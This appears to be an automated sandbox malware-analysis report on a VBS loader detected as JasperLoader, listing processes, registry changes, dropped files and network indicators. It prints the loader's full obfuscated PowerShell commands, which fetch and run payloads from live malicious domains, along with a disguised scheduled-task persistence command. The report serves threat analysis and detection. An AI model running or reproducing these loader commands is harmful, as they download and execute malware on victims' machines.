Field | Value |
---|---|
File name | IT155060755342376521807896714438.vbs |
Full analysis | https://app.any.run/tasks/66e32315-a565-447c-9f73-eaf16ff5e8fc |
Verdict | Malicious activity |
Threats | A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection. |
Analysis date | May 15, 2019, 13:20:48 |
OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags |  |
Indicators |  |
MIME | text/plain |
File info | ASCII text, with CRLF, LF line terminators |
MD5 | 5B38DDCB36538A1A861F52F533226C44 |
SHA1 | F0EB70C208FD5212034FF283CDE48248E9E5636F |
SHA256 | 2FFAA86ED8472849C47C813D8C8E8C409584221BC9B11704388BF10E65D4B590 |
SSDEEP | 48:+BPnlQ1pT/oMZQUWc7uisx0IzQvWs6WhwbKsRVXrHZFMZQUWvNbQL2SAK7AfWBS1:GQUL |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2124 | "C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\IT155060755342376521807896714438.vbs" | C:\Windows\System32\WScript.exe | — | explorer.exe |
User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft ® Windows Based Script Host; Exit code: 0; Version: 5.8.7600.16385
3596 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command $scau='';105,102,40,40,40,71,101,116,45,85,73,67,117,108,116,117,114,101,41,46,78,97,109,101,32,45,109,97,116,99,104,32,34,82,85,124,85,65,124,66,89,124,67,78,34,41,32,45,111,114,32,40,40,71,101,116,45,87,109,105,79,98,106,101,99,116,32,45,99,108,97,115,115,32,87,105,110,51,50,95,67,111,109,112,117,116,101,114,83,121,115,116,101,109,32,45,80,114,111,112,101,114,116,121,32,77,111,100,101,108,41,46,77,111,100,101,108,32,45,109,97,116,99,104,32,34,86,105,114,116,117,97,108,66,111,120,124,86,77,119,97,114,101,124,75,86,77,34,41,41,123,101,120,105,116,59,125,59,36,99,106,115,100,61,32,74,111,105,110,45,80,97,116,104,32,36,101,110,118,58,116,101,109,112,32,34,87,105,110,48,49,99,101,46,106,115,34,59,36,103,100,115,101,61,32,74,111,105,110,45,80,97,116,104,32,36,69,78,86,58,85,115,101,114,80,114,111,102,105,108,101,32,34,67,114,121,112,115,114,118,46,101,120,101,34,59,116,114,121,123,40,78,101,119,45,79,98,106,101,99,116,32,78,101,116,46,87,101,98,67,108,105,101,110,116,41,46,68,111,119,110,108,111,97,100,83,116,114,105,110,103,40,34,104,116,116,112,58,47,47,101,109,101,46,101,109,101,114,97,108,100,115,117,114,102,118,105,115,105,111,110,46,99,111,109,47,118,50,105,46,112,104,112,63,110,101,101,100,61,106,115,38,118,105,100,61,112,101,99,49,49,118,98,115,38,97,106,122,104,101,34,41,124,111,117,116,45,102,105,108,101,32,36,99,106,115,100,59,83,116,97,114,116,45,80,114,111,99,101,115,115,32,36,99,106,115,100,59,125,99,97,116,99,104,123,125,59,116,114,121,123,40,78,101,119,45,79,98,106,101,99,116,32,78,101,116,46,87,101,98,67,108,105,101,110,116,41,46,68,111,119,110,108,111,97,100,70,105,108,101,40,34,104,116,116,112,58,47,47,102,97,100,46,99,50,49,97,98,101,108,46,105,110,102,111,47,97,112,105,63,98,99,102,115,98,34,44,36,103,100,115,101,41,59,83,116,97,114,116,45,80,114,111,99,101,115,115,32,36,103,100,115,101,59,125,99,97,116,99,104,123,125,59|%{$tswa=[char]$_;$scau+=$tswa};iex
 $scau; | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |  | WScript.exe |
User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255)
3120 | "C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\Win01ce.js" | C:\Windows\System32\WScript.exe | — | powershell.exe |
User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft ® Windows Based Script Host; Exit code: 0; Version: 5.8.7600.16385
2468 | "C:\Windows\system32\ntvdm.exe" -i1 | C:\Windows\system32\ntvdm.exe | — | powershell.exe |
User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: NTVDM.EXE; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255)
2508 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $bfsci='';function ejsxzc($ucdehft){return [Char]([int](13979 - 5562 - 8037 - 352 + $ucdehft));};77,74,12,4,12,43,73,88,17,57,45,39,89,80,88,89,86,73,13,18,50,69,81,73,4,17,81,69,88,71,76,4,11,39,50,96,54,51,96,54,57,96,57,37,96,38,61,11,4,17,83,86,4,12,43,73,88,17,59,81,77,51,70,78,73,71,88,4,17,71,80,69,87,87,4,59,77,82,23,22,67,39,83,81,84,89,88,73,86,55,93,87,88,73,81,4,17,52,86,83,84,73,86,88,93,4,49,83,72,73,80,13,18,49,83,72,73,80,4,17,81,69,88,71,76,4,11,58,77,86,88,89,69,80,38,83,92,96,58,49,91,69,86,73,96,47,58,49,11,4,13,95,4,73,92,77,88,31,4,97,-18,8,70,75,67,43,83,83,72,52,37,88,76,4,33,4,8,74,69,80,87,73,31,-18,12,46,83,77,82,17,52,69,88,76,4,8,41,50,58,30,57,87,73,86,52,86,83,74,77,80,73,4,11,64,37,84,84,40,69,88,69,64,54,83,69,81,77,82,75,64,49,77,71,86,83,87,83,74,88,11,13,16,4,8,41,50,58,30,57,87,73,86,52,86,83,74,77,80,73,16,4,12,46,83,77,82,17,52,69,88,76,4,4,8,73,82,90,30,52,57,38,48,45,39,4,6,64,48,77,70,86,69,86,77,73,87,6,13,16,4,63,41,82,90,77,86,83,82,81,73,82,88,65,30,30,43,73,88,42,83,80,72,73,86,52,69,88,76,12,11,37,84,84,80,77,71,69,88,77,83,82,40,69,88,69,11,13,16,4,8,41,50,58,30,88,73,81,84,4,96,4,9,95,-18,4,4,77,74,12,4,56,73,87,88,17,52,69,88,76,4,12,4,46,83,77,82,17,52,69,88,76,4,8,67,4,6,49,77,71,86,83,87,83,74,88,41,72,85,73,18,77,82,77,6,4,13,4,13,95,-18,4,4,4,4,8,70,75,67,43,83,83,72,52,37,88,76,4,33,4,8,67,31,-18,4,4,97,-18,4,4,77,74,12,4,5,8,70,75,67,43,83,83,72,52,37,88,76,4,13,95,-18,4,4,4,4,8,73,87,89,78,73,4,33,4,46,83,77,82,17,52,69,88,76,4,8,67,4,6,89,71,77,75,90,6,31,-18,4,4,4,4,88,86,93,95,-18,4,4,4,4,4,4,87,71,4,17,52,69,88,76,4,8,73,87,89,78,73,4,17,58,69,80,89,73,4,8,84,77,72,31,-18,4,4,4,4,4,4,86,77,4,17,52,69,88,76,4,8,73,87,89,78,73,31,4,-18,4,4,4,4,4,4,8,70,75,67,43,83,83,72,52,37,88,76,4,33,4,8,67,31,-18,4,4,4,4,97,71,69,88,71,76,95,-18,4,4,4,4,4,4,8,70,75,67,43,83,83,72,52,37,88,76,4,33,4,8,74,69,80,87,73,31,-18,4,4,4,4,97,-18,4,4,97,-18,97,-1
8,77,74,12,4,8,70,75,67,43,83,83,72,52,37,88,76,4,13,95,-18,4,4,8,71,88,92,71,91,73,94,4,4,33,4,11,11,31,-18,4,4,8,71,88,71,74,91,89,94,4,33,4,8,70,75,67,43,83,83,72,52,37,88,76,4,15,4,6,64,72,83,71,89,81,73,82,88,87,6,31,-18,4,4,8,78,71,92,70,77,4,4,4,4,33,4,8,70,75,67,43,83,83,72,52,37,88,76,4,15,4,6,64,59,77,82,72,83,91,87,45,82,72,73,92,77,82,75,55,73,86,90,77,71,73,18,78,87,6,31,-18,4,4,8,94,72,72,94,76,88,4,33,4,50,73,91,17,51,70,78,73,71,88,4,55,93,87,88,73,81,18,50,73,88,18,59,73,70,39,80,77,73,82,88,31,-18,4,4,8,94,72,72,94,76,88,18,39,86,73,72,73,82,88,77,69,80,87,4,33,4,63,55,93,87,88,73,81,18,50,73,88,18,39,86,73,72,73,82,88,77,69,80,39,69,71,76,73,65,30,30,40,73,74,69,89,80,88,39,86,73,72,73,82,88,77,69,80,87,31,-18,4,4,77,74,4,12,17,82,83,88,4,12,56,73,87,88,17,52,69,88,76,4,8,78,71,92,70,77,4,4,13,4,13,95,4,4,8,94,72,72,94,76,88,18,40,83,91,82,80,83,69,72,55,88,86,77,82,75,12,11,76,88,88,84,30,19,19,94,94,77,18,70,73,80,80,73,90,77,80,80,73,72,71,18,71,83,81,19,90,22,77,18,84,76,84,35,82,73,73,72,33,78,87,10,11,13,4,96,4,83,89,88,17,74,77,80,73,4,8,78,71,92,70,77,4,31,4,97,-18,4,4,77,74,4,12,17,82,83,88,4,12,56,73,87,88,17,52,69,88,76,4,8,71,88,71,74,91,89,94,13,4,13,95,4,8,94,72,72,94,76,88,18,40,83,91,82,80,83,69,72,55,88,86,77,82,75,12,11,76,88,88,84,30,19,19,94,94,77,18,70,73,80,80,73,90,77,80,80,73,72,71,18,71,83,81,19,90,22,77,18,84,76,84,35,82,73,73,72,33,70,83,72,93,10,11,13,4,96,4,83,89,88,17,74,77,80,73,4,8,71,88,71,74,91,89,94,31,4,4,97,-18,4,4,88,86,93,95,-18,4,4,4,4,43,73,88,17,39,83,82,88,73,82,88,4,8,71,88,71,74,91,89,94,96,4,59,76,73,86,73,17,51,70,78,73,71,88,4,95,8,67,4,17,81,69,88,71,76,4,8,86,73,75,73,92,97,4,96,4,42,83,86,41,69,71,76,17,51,70,78,73,71,88,95,4,8,71,88,92,71,91,73,94,4,15,33,4,8,67,4,17,86,73,84,80,69,71,73,4,11,18,18,12,18,13,11,16,11,8,21,11,97,31,-18,4,4,4,4,77,73,92,4,8,71,88,92,71,91,73,94,31,-18,4,4,97,71,69,88,71,76,95,97,31,-18,97,-18|%{$bfsci += ejsxzc($_);};iex $bfsci; | 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |  | WScript.exe |
User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Version: 6.1.7600.16385 (win7_rtm.090713-1255)
3664 | "C:\Windows\system32\schtasks.exe" /create /TN "Windows Indexing Service" /sc DAILY /st 00:00 /f /RI 20 /du 24:59 /TR C:\Users\admin\AppData\Roaming\Microsoft\WindowsIndexingService.js | C:\Windows\system32\schtasks.exe | — | powershell.exe |
User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Manages scheduled tasks; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255)
PID | Process | Key | Name | Operation | Value |
---|---|---|---|---|---|
2124 | WScript.exe | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | UNCAsIntranet | write | 0 |
2124 | WScript.exe | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | AutoDetect | write | 1 |
3596 | powershell.exe | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | LanguageList | write | en-US |
3596 | powershell.exe | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | EnableFileTracing | write | 0 |
3596 | powershell.exe | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | EnableConsoleTracing | write | 0 |
3596 | powershell.exe | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | FileTracingMask | write | 4294901760 |
3596 | powershell.exe | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | ConsoleTracingMask | write | 4294901760 |
3596 | powershell.exe | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | MaxFileSize | write | 1048576 |
3596 | powershell.exe | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | FileDirectory | write | %windir%\tracing |
3596 | powershell.exe | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS | EnableFileTracing | write | 0 |
PID | Process | Filename | Type | MD5 | SHA256 |
---|---|---|---|---|---|
3596 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1UD321Q2F6SN377YHWPO.temp | — | — | — |
2468 | ntvdm.exe | C:\Users\admin\AppData\Local\Temp\scs474D.tmp | — | — | — |
2468 | ntvdm.exe | C:\Users\admin\AppData\Local\Temp\scs475E.tmp | — | — | — |
2508 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\G215CGUPKZKE3ZH9GP25.temp | — | — | — |
2508 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\ucigv | — | — | — |
3596 | powershell.exe | C:\Users\admin\AppData\Local\Temp\Win01ce.js | text | AEF73035BB452A1F5AEC9AA726080EEB | 70DF03C36E7B3B7ECCDC7B3EFA6461A75AC13422E134EA9AF2FA2889CC07776C |
2508 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\documents | text | 9D145924007A69FF75F3B9200D7EFD61 | 8E15C02CE51B62056ADDBDFA69E4913B148D1D617AAAB1A4B34B41D073C7320F |
3596 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF134067.TMP | binary | 33B4C42BAF9E3CA295E3BDCD51C02EAF | B4273C31A01B0B90869574075D54D52E8098519587F61AE756B69729D0AF86A5 |
3596 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | 33B4C42BAF9E3CA295E3BDCD51C02EAF | B4273C31A01B0B90869574075D54D52E8098519587F61AE756B69729D0AF86A5 |
3596 | powershell.exe | C:\Users\admin\Crypsrv.exe | text | 002980E7414C1FCFBF9320983A4C4D6B | 6C7DC20FDC31326AF0691F097AC0CFE26940BF76C63560EF18C8721E68FAA350 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3596 | powershell.exe | GET | 200 | 185.212.47.163:80 | http://fad.c21abel.info/api?bcfsb | DE | text | 10 b | suspicious |
2508 | powershell.exe | GET | 200 | 176.10.118.245:80 | http://zzi.bellevilledc.com/v2i.php?need=body& | CH | text | 11.7 Kb | malicious |
2508 | powershell.exe | GET | 200 | 176.10.118.245:80 | http://zzi.bellevilledc.com/v2i.php?guid=USER-PC_2ea6daede3b54a598aa9&v=512.2&cache=&psver=2&ssid=4939b5d084e14f31&os=6.1.7601.17514 | CH | text | 21 b | malicious |
2508 | powershell.exe | GET | 200 | 176.10.118.245:80 | http://zzi.bellevilledc.com/v2i.php?guid=USER-PC_2ea6daede3b54a598aa9&v=512.2&lg%5Burl%5D=http://zzi.bellevilledc.com/v2i.php | CH | text | 21 b | malicious |
2508 | powershell.exe | GET | 200 | 176.10.118.245:80 | http://zzi.bellevilledc.com/v2i.php?need=js& | CH | text | 15.8 Kb | malicious |
3596 | powershell.exe | GET | 200 | 185.158.249.122:80 | http://eme.emeraldsurfvision.com/v2i.php?need=js&vid=pec11vbs&ajzhe | NL | text | 13.9 Kb | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3596 | powershell.exe | 185.212.47.163:80 | fad.c21abel.info | 23media GmbH | DE | unknown |
3596 | powershell.exe | 185.158.249.122:80 | eme.emeraldsurfvision.com | easystores GmbH | NL | malicious |
2508 | powershell.exe | 176.10.118.245:80 | zzi.bellevilledc.com | SOFTplus Entwicklungen GmbH | CH | malicious |
Domain | IP | Reputation |
---|---|---|
eme.emeraldsurfvision.com |  | malicious |
fad.c21abel.info |  | suspicious |
zzi.bellevilledc.com |  | malicious |
PID | Process | Class | Message |
---|---|---|---|
2508 | powershell.exe | A Network Trojan was detected | MALWARE [PTsecurity] Trojan-Downloader.Script.Generic (JasperLoader) |